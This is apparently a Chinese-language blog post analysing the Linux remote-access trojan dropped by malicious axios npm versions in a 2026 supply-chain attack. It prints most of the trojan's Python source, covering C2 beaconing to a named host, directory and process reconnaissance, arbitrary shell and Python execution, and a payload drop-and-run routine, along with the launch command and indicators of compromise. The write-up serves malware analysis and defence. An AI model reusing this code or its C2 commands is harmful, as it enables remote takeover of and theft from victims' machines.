axios投毒样本分析

事件概述

2026 年 3 月 31 日,全球最广泛使用的 JavaScript HTTP 客户端库 axios(周下载量逾 3 亿次)遭遇严重供应链投毒攻击。攻击者通过劫持核心维护者 npm 账号,绕过官方 GitHub Actions CI/CD 发布流程,手动发布了两个恶意版本(axios@1.14.1 与 axios@0.30.4),同时覆盖 1.x 与 0.x 两大版本分支。恶意版本以幻影依赖plain-crypto-js@4.2.1 为载体,在用户执行 npm install 时通过 postinstall 钩子自动投放跨平台远程访问木马(RAT),目标覆盖 Windows / macOS / Linux 三大平台,并具备自清除反取证机制。恶意版本存活约 2-4 小时后被 npm 官方下架,在投毒窗口期内只要安装了被投毒的版本就会执行,npm install即可触发

样本分析

也是非常幸运,同事的Linux恰好就受到影响了,所以本文以Linux系统下的样本为例进行分析,其他平台的操作应该是类似的,可以类比过去。

一、执行流程概览

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
初始执行阶段
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
恶意 Python 样本被执行
│
▼
读取命令行参数 sys.argv[1]
作为 C2 URL
│
▼
生成 16 位随机 UID
│
▼
识别系统架构
├─ x86_64 / amd64 → linux_x64
├─ arm / aarch → linux_arm
└─ 其他 → linux_unknown
│
▼
初始目录侦察
├─ $HOME
├─ $HOME/.config
├─ $HOME/Documents
└─ $HOME/Desktop
│
▼
向 C2 发送 FirstInfo
├─ uid
├─ os
└─ 初始目录内容
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
│
▼
持续控制阶段
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
进入 main_work() 无限循环
│
▼
每 60 秒采集并上报主机信息 BaseInfo
├─ hostname
├─ username
├─ OS / 内核版本
├─ 时区
├─ 安装时间
├─ 启动时间
├─ 当前时间
├─ 硬件厂商 / 设备型号
└─ 进程列表
│
▼
等待 C2 返回任务
│
├─► kill
│ └─ 回传 success 后退出进程
│
├─► runscript
│ ├─ 若携带 Script:Base64 解码为 Python 代码
│ │ 调用 python3 -c 执行
│ └─ 若 Script 为空:直接 shell=True 执行 Param
│
├─► rundir
│ └─ 按指定路径枚举目录/文件信息并回传
│
└─► peinject(因代码错误引用未定义变量故无法正常工作)
├─ 试图 Base64 解码二进制载荷
├─ 写入 /tmp/.<随机6位>
├─ chmod 777
└─ 执行该临时文件
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

流程设计分析:

从流程图可以看出,样本采用”轻量上线、渐进收集”的策略。首次连接仅发送 UID、OS 类型及少量目录信息,而非一次性收集全部主机数据。这种设计有几个考量:

  1. 降低首次连接的敏感度——首次上线的流量包较小,与普通HTTP请求差异不大,不易触发流量告警
  2. 快速建立通道——先确保与C2的通信正常,再进行后续信息收集
  3. 隐蔽性权衡——虽然样本具备完整的远控能力,但未实现持久化机制,说明攻击者可能采用”一次性使用”或”按需投放”的运营模式,而非长期驻留

值得注意的是,样本在Linux端没有写入crontab、systemd服务或修改shell配置文件等持久化操作。结合axios投毒的事件背景,攻击者可能预期受害规模较大,通过”广撒网”方式筛选高价值目标后,再手动植入更隐蔽的持久化后门。

ld.py 的主体由多个功能函数组成,程序从最后一行 work() 处开始执行:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
def work():
url = sys.argv[1]
uid = generate_random_string(16)
os = get_os()
dir_info = init_dir_info()
body = {
"type": "FirstInfo",
"uid": uid,
"os": os,
"content": dir_info
}
send_result(url, body)
main_work(url, uid)
return True

work()

二、入口函数与C2通信

sys.argv[1] 取脚本名后的第一个参数作为 URL,随后生成 16 位随机字符串作为受害主机唯一标识(UID),再获取操作系统类型和初始目录信息,封装成 FirstInfo 类型的请求体发送到 C2,最后进入主循环。

不难猜测,这里的url很可能就是C2地址,如果在日志里获取到url也许可以作为IOC。

根据 StepSecurity 的分析,实际的启动命令为:

1
nohup python3 /tmp/ld.py ${c2Url} > /dev/null 2>&1 &

这条启动命令体现了攻击者的操作经验:

  • nohup:使进程忽略 SIGHUP 信号,即使终端关闭进程仍能存活
  • > /dev/null 2>&1:将标准输出和标准错误重定向到 /dev/null,避免产生任何可见日志
  • **&**:将进程放入后台执行

整套命令是 Linux 下运行守护进程的标准写法。同时,URL 参数在启动时直接传入而非硬编码在样本中,这种设计使得攻击者可以灵活切换 C2 地址,无需重新打包样本。根据逆向分析,该样本使用的 C2 地址为 http://sfrclak.com:8000/。

三、初始信息收集

样本上线后的第一步是目录侦察,init_dir_info() 负责收集用户家目录下的敏感路径:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
def init_dir_info():
home_dir = Path.home()
init_dir = [
home_dir,
home_dir / ".config",
home_dir / "Documents",
home_dir / "Desktop",
]
rlt = []
idx = 0
for item in init_dir:
if item.exists():
rlt.append(get_filelist(str(item), "FirstReqPath-" + str(idx)))
idx = idx + 1
return rlt

这个函数首先获取用户的home目录,然后拼接.config,Documents和Desktop路径,组成一个包含四个路径的列表,对这 4 个目录逐个检查,如果目录存在,就调用 get_filelist() 进行遍历

目录选择的分析: 这四个目录的选择并非随意:

  • $HOME:用户根目录,可能包含敏感配置文件如 .ssh、.bash_history、.gitconfig 等
  • $HOME/.config:许多应用程序存储配置文件的目录,可能包含凭证、API key 等
  • $HOME/Documents 和 $HOME/Desktop:用户常用工作目录,可能包含项目文件、文档等

攻击者通过这些目录的内容可以快速判断受害主机的”价值”——是开发机器、运维机器还是普通用户机器。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
def get_filelist(PathStr, id, Recurse=False):
p = Path(PathStr)
if not p.exists():
raise Exception(f"No Exists Such Dir: {PathStr}")
items = p.rglob("*") if Recurse else p.iterdir()
result = []
for item in items:
stat = item.stat()
created_ts = getattr(stat, "st_birthtime", None)
created = int(created_ts) if created_ts is not None else 0
modified = int(stat.st_mtime)
hasItems = False
if item.is_dir():
hasItems = any(item.iterdir())
result.append({
"Name": item.name,
"IsDir": item.is_dir(),
"SizeBytes": 0 if item.is_dir() else stat.st_size,
"Created": created,
"Modified": modified,
"HasItems": hasItems
})
return {
"id": id,
"parent": str(p),
"childs": result
}

这里通过Path(PathStr) 初始化路径对象,并检查目录是否存在,如果不存在直接抛出异常,如果存在则判断Recurse参数,Recurse参数默认为False,所以默认走p.iterdir()分支,即遍历该目录下的一级子目录下直接子项,不会继续往下查询子目录,如果Recurse为True,就递归列整个目录树

通过阅读整个样本可以看到,两处调用get_filelist的方法init_dir_info()和do_action_dir(),都没有显式传入Recurse参数,因此样本只收集目标目录下第一层子项。

为什么只遍历一层? 这应该是有意为之的设计:

  1. 控制数据量——递归遍历整个家目录可能产生数万条记录,导致首次上报包过大
  2. 降低IO开销——大量磁盘读取可能触发EDR/主机安全产品的异常行为告警
  3. 快速上线——减少首次通信延迟,尽快建立C2通道

进入for循环,item.stat()获取文件的大小、权限、时间戳等信息,如果创建时间created_ts不为空就转成整数时间戳,为空就设置为0,随后获取文件的最后修改时间。接着判断当前这个 item 是不是目录,如果是目录,遍历当前这个item的直接子项然后用any判断,意思是看当前目录是不是空目录,如果为空就返回False。最后把文件/目录名、是否是目录、文件大小等信息返回

回到init_dir_info()函数的这一行:rlt.append(get_filelist(str(item), “FirstReqPath-“ + str(idx))),前面是把Path 对象转换成普通字符串,后面拼接FirstReqPath-0,然后idx+1,这里应该是作为一个结果标签。

从攻击者的角度看,首次侦察的目的是快速摸清受害主机的基本情况——有没有开发环境、有没有敏感配置、大概是什么类型的机器。这些信息会帮助攻击者在C2面板上快速筛选值得深入的目标,而不是对所有受害者一视同仁地投入精力。

四、数据编码与HTTP传输

收集完信息后,样本需要将数据外传。来看通信模块的设计:

1
2
3
4
5
def send_result(url, body):
encoded = base64.b64encode(
json.dumps(body, ensure_ascii=False).encode("utf-8")
).decode()
return send_post_request(url, encoded)

这个函数逻辑很简单,把前面的body字典转换成base64编码的数据了,然后紧接着调用send_post_request

send_post_request() 负责 HTTP 请求的具体实现:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
def send_post_request(full_url, data):
try:
url_parts = urlsplit(full_url)
host = url_parts.netloc
path = url_parts.path or "/"
if url_parts.query:
path += "?" + url_parts.query
if isinstance(data, str):
data = data.encode("utf-8")
if url_parts.scheme == "https":
conn = http.client.HTTPSConnection(host, timeout=60)
else:
conn = http.client.HTTPConnection(host, timeout=60)

headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0)",
}

conn.request("POST", path, data, headers)
response = conn.getresponse()
response_data = response.read()

conn.close()
return response_data
except Exception:
return None

样本通过 urlsplit 解析传入的 C2 地址,如果 data 为字符串,则先通过 data.encode(“utf-8”) 将其转换为 UTF-8 字节流,这里又将字符串转为字节,在这个具体的场景下其实有点多余,因为前面有一步把UTF-8 字节流转换成base64字符串的步骤。接着根据协议动态选择 HTTP 或 HTTPS 通道,但结合 setup.js 的逆向分析结果可知,该样本所使用的 C2 基础地址已固定为http://sfrclak.com:8000/,因此这一动态选择逻辑在当前场景下实际意义有限,不过,从代码实现上看,攻击者显然为后续复用或变种保留了对 HTTPS 的兼容能力。

mozilla/4.0 (compatible; msie 8.0; windows nt 5.1; trident/4.0) 是 Windows XP 时代 IE8 的标识,在现代网络环境中几乎绝迹。这种伪装反而显得突兀——可能作者复用了旧代码片段,或刻意选择一个不会被正常业务流量匹配的标识,便于C2服务端区分恶意流量。Base64 编码虽然不是加密,但能绕过一些基于关键词的流量过滤;函数对异常进行了整体吞并,网络通信失败时不会抛出明显错误,而是静默返回 None。这种设计使得样本在网络不稳定或被阻断时不会产生异常日志,具有隐蔽通信特征。

五、主循环与心跳机制

请求发送后,程序回到main_work(),进入主循环持续收集主机状态:

1
2
3
4
5
6
7
8
9
10
11
12
def main_work(url, uid):
boot_time = str(get_boot_time())
installation_time = str(get_installation_time())
timezone = str(datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo)
manufacturer, product_name = get_system_info()
os_version = platform.system() + " " + platform.release() + " "
os = get_os()

while True:
current_time = str(datetime.datetime.now())
ps = print_process_list()
# 省略后半部分程序

函数先获取系统启动时间、系统安装时间、时区、设备厂商与产品名称,以及操作系统等相对稳定的信息。随后程序进入死循环,每轮循环都会重新获取当前时间

进程采集的分析: 进程列表是攻击者重点关注的信息。通过进程列表可以:

  • 判断主机是否运行安全软件(杀毒、EDR等)
  • 发现高价值进程(数据库、VPN、开发工具等)
  • 识别其他入侵痕迹(竞争攻击者的后门)
  • 在自身进程前加 * 标记,方便攻击者在C2面板上快速定位
1
2
def print_process_list():
process_list = get_process_list()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
def get_process_list():
process_list = []
current_pid = os.getpid()

for pid in os.listdir("/proc"):
if pid.isdigit():
try:
cmdline_path = os.path.join("/proc", pid, "cmdline")
if os.path.exists(cmdline_path):
with open(cmdline_path, "r") as cmdline_file:
cmdline = cmdline_file.read().replace("\x00", " ").strip()
else:
cmdline = "N/A"

with open(os.path.join("/proc", pid, "stat"), "r") as stat_file:
stat_content = stat_file.read().split()
ppid = int(stat_content[3])
start_time_ticks = int(stat_content[21])

with open("/proc/uptime", "r") as uptime_file:
uptime_seconds = float(uptime_file.readline().split()[0])
system_boot_time = datetime.datetime.now() - datetime.timedelta(
seconds=uptime_seconds
)
start_time = system_boot_time + datetime.timedelta(
seconds=start_time_ticks
/ os.sysconf(os.sysconf_names["SC_CLK_TCK"])
)

with open(os.path.join("/proc", pid, "status"), "r") as status_file:
for line in status_file:
if line.startswith("Uid:"):
uid = int(line.split()[1])
break
else:
uid = -1

username = "N/A"
if uid != -1:
with open("/etc/passwd", "r") as passwd_file:
for passwd_line in passwd_file:
fields = passwd_line.strip().split(":")
if int(fields[2]) == uid:
username = fields[0]
break

if int(pid) == current_pid:
process_list.append(
(int(pid), ppid, username, start_time, "*" + cmdline)
)
else:
process_list.append((int(pid), ppid, username, start_time, cmdline))
except (FileNotFoundError, IndexError, ValueError):
pass

return process_list

遍历/proc 文件系统,枚举当前系统中的所有进程。对于每个进程,样本会读取 /proc/pid/cmdline 获取命令行参数,读取 /proc/pid/status 提取父进程 PID 及启动时间相关字段,再结合 /proc/uptime 将进程启动 tick 换算为实际启动时间;同时,样本还会从 /proc/pid/status 中解析 UID,并通过 /etc/passwd 将 UID 映射为用户名。最终,函数将 PID、父进程 PID、用户名、进程启动时间及命令行信息汇总后返回。若遍历到样本自身进程,则会在命令行前增加 * 标记

然后回到main_work() 的循环体:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
def main_work(url, uid):
while True:
current_time = str(datetime.datetime.now())
ps = print_process_list()

data = {
"hostname": get_host_name(),
"username": get_user_name(),
"os": os,
"version": os_version,
"timezone": timezone,
"installDate": installation_time,
"bootTimeString": boot_time,
"currentTimeString": current_time,
"modelName": manufacturer,
"cpuType": product_name,
"processList": ps
}
body = {
"type": "BaseInfo",
"uid": uid,
"data": data
}
response_content = send_result(url, body)

if response_content:
result = process_request(url, uid, response_content)

time.sleep(60)

进程列表、主机名、用户名、操作系统信息等内容组装成 data 字典,再封装进 type 为 BaseInfo 的 body 结构中,通过 send_result(url, body) 周期性发送到 C2。

从字段设计上看,这一阶段发送的数据比首次上线时更完整,除基础主机标识外,还包含安装时间、启动时间、时区、设备信息及进程列表,说明样本并不只是做一次简单上线报到,而是在持续收集受害主机的运行状态,为攻击者建立较完整的主机画像。在通信逻辑上,样本每轮发送完 BaseInfo 后,都会检查 C2 是否返回内容;如果 response_content 不为空,则立即调用 process_request(url, uid, response_content) 进行处理。

六、四种任务指令

样本通过 process_request() 接收并处理 C2 下发的任务指令:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
def process_request(url, uid, data) -> bool:
if len(data) == 0:
return False

json_obj = json.loads(data)

if json_obj.get("type") == "kill":
body = {
"type": "CmdResult",
"cmd": "rsp_kill",
"cmdid": json_obj.get("CmdID"),
"uid": uid,
"status": "success",
}
send_result(url, body)
sys.exit(0)

elif json_obj.get("type") == "peinject":
rlt = do_action_ijt(
json_obj.get("IjtBin"),
json_obj.get("Param")
)
body = {
"type": "CmdResult",
"cmd": "rsp_peinject",
"cmdid": json_obj.get("CmdID"),
"uid": uid,
"status": rlt.get("status"),
"msg": rlt.get("msg"),
}
send_result(url, body)

elif json_obj.get("type") == "runscript":
rlt = do_action_scpt(
json_obj.get("Script"),
json_obj.get("Param")
)
body = {
"type": "CmdResult",
"cmd": "rsp_runscript",
"cmdid": json_obj.get("CmdID"),
"uid": uid,
"status": rlt.get("status"),
"msg": rlt.get("msg"),
}
send_result(url, body)

elif json_obj.get("type") == "rundir":
rlt = do_action_dir(json_obj.get("ReqPaths"))
body = {
"type": "CmdResult",
"cmd": "rsp_rundir",
"cmdid": json_obj.get("CmdID"),
"status": "Wow",
"uid": uid,
"msg": rlt,
}
send_result(url, body)

return True

这里的三个参数分别是C2地址、受害主机的唯一标识以及C2的返回包,这里的结构比较清晰,如果返回包为空,就直接return False,如果不为空就根据 type 分发命令

1. kill:退出清理

如果type是kill,就把执行结果、标识信息返回给C2服务器,然后杀掉自身进程,让样本自己退出,这里应该是在下发二阶段的payload以后清理痕迹。

2. peinject:二进制载荷投放

如果type是peinject,来到do_action_ijt函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
def do_action_ijt(ijtbin, param):
payload = base64.b64decode(b64_string)

file_path = f"/tmp/.{generate_random_string(6)}"
try:
with open(file_path, "wb") as file:
file.write(payload)

os.chmod(file_path, 0o777)

subprocess.Popen(
[file_path] + shlex.split(param.decode("utf-8", errors="strict"))
)
except Exception as e:
return {
"status": "Zzz",
"msg": str(e)
}

return {
"status": "Wow",
"msg": ""
}

这里发现函数传参原本是ijtbin,但是b64decode的却是b64_string,这里应该是程序写错了,估计准备不是很充分,网上搜寻资料也可以佐证这一点:
“该函数do_action_ijt()引用了一个未定义的变量b64_string而不是其参数ijtbin,因此即使在信标循环运行的系统上,C2 也无法传递二进制有效载荷”

这个 bug 导致 peinject 功能实际无法工作,这意味着一旦 C2 下发type是peinject的指令,样本进程会直接崩溃退出。

这里虽然他写错了,不过依然有学习的价值,先假设他正确传参了。

程序首先把攻击者下发的 Base64 文本还原成原始二进制数据,然后在/tmp目录下生成了一个隐藏文件,以.开头后接6位随机字符,并把文件权限改为777,然后把param从字节解码成字符串作为参数启动刚才落地的文件。程序做了兜底,如果报错会返回错误信息

3. runscript:命令执行

runscript 是样本的核心远控能力,支持两种执行模式:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
def do_action_scpt(scpt, param):
if not scpt:
return do_run_scpt(param)

try:
payload = base64.b64decode(scpt).decode("utf-8", errors="strict")

result = subprocess.run(
["python3", "-c", payload] + shlex.split(param),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True
)

return {
"status": "Wow",
"msg": result.stdout
}

except Exception as e:
return {
"status": "Zzz",
"msg": str(e)
}

首先判断scpt是否为空,如果是空则调用 do_run_scpt,跟进

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
def do_run_scpt(cmdline):
try:
result = subprocess.run(
cmdline,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True
)
return {
"status": "Wow",
"msg": result.stdout
}
except Exception as e:
return {
"status": "Zzz",
"msg": str(e)
}

(这里直接把参数名改为cmdline,应该是作为命令执行。)

这里通过subprocess.run调用系统shell执行传入的命令,并将标准输出与标准错误合并捕获,然后返回

回到do_action_scpt,如果scpt不为空,就把scpt进行Base64解码然后通过python3 -c执行python代码,同样将标准输出与标准错误合并捕获后返回

4. rundir:按需目录侦察

来到process_request的最后一个分支:如果type是rundir,进入do_action_dir

1
2
3
4
5
def do_action_dir(Paths):
rlt = []
for item in Paths:
rlt.append(get_filelist(item["path"], item["id"]))
return rlt

这段代码本身不复杂,逻辑非常直接:样本会遍历 C2 下发的 Paths 列表,对其中每个条目取出 path 和 id,再调用 get_filelist() 处理,而get_filelist() 这个函数前面已经分析过,作用是获取该路径下的所有文件和文件夹的名字、是否为文件夹、文件大小、创建时间、最后修改时间和是否为空目录的信息

可以看出,rundir 分支并不是执行目录中的程序,而更像是按照攻击者指定的路径,收集对应目录或文件信息并回传。

IOC

主机落地文件层面:

1
2
3
4
5
6
7
8
# macOS
/Library/Caches/com.apple.act.mond
# Windows
%PROGRAMDATA%\wt.exe
%TEMP%\6202033.vbs 临时(自删除)
%TEMP%\6202033.ps1 临时(自删除)
# Linux
/tmp/ld.py

网络侧:

1
C2:http://sfrclak.com:8000/6202033

总结

综合来看,该样本具备典型的双向 C2 交互能力:一方面定期向远端汇报主机状态,另一方面轮询并接收远端下发的后续任务或控制指令。函数通过time.sleep(60) 将每轮通信间隔固定为 60 秒,采用较低频、较稳定的轮询机制,既能维持持续控制,又不会因请求过于频繁而产生明显的网络噪声。本次分析的一个意外发现是 do_action_ijt 函数中的变量引用错误——参数名为 ijtbin,但 Base64 解码时却引用了未定义的 b64_string,这个 bug 导致 peinject 功能实际无法工作,一旦 C2 下发该指令,样本进程会直接崩溃退出。

参考文章

https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan

https://securitylabs.datadoghq.com/articles/axios-npm-supply-chain-compromise/

https://mp.weixin.qq.com/s/IBf3K2pbP9cKrJjpzddynA


axios投毒样本分析
http://example.com/2026/04/10/axios样本分析/
作者
想有双手
发布于
2026年4月10日
许可协议